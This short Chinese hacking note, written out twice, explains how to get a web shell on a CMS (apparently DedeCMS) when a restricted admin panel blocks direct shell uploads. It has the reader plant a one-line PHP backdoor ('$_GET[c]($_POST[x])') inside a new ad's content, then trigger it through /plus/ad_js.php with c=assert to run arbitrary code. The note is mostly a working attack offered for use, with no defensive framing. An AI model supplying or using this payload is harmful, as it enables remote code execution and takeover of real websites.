遇到一个被阉割的后台,发现直接传shell显然不行。
然后就有了下文
添加一个新广告。
插入一句话木马:
1 --><?php $_GET[c]($_POST[x]);?><!--
然后访问:
/plus/ad_js.php?aid=42&c=assert
aid后面的值是你广告的id。
遇到一个被阉割的后台,发现直接传shell显然不行。
然后就有了下文
添加一个新广告。
插入一句话木马:
1 --><?php $_GET[c]($_POST[x]);?><!--
然后访问:
/plus/ad_js.php?aid=42&c=assert
aid后面的值是你广告的id。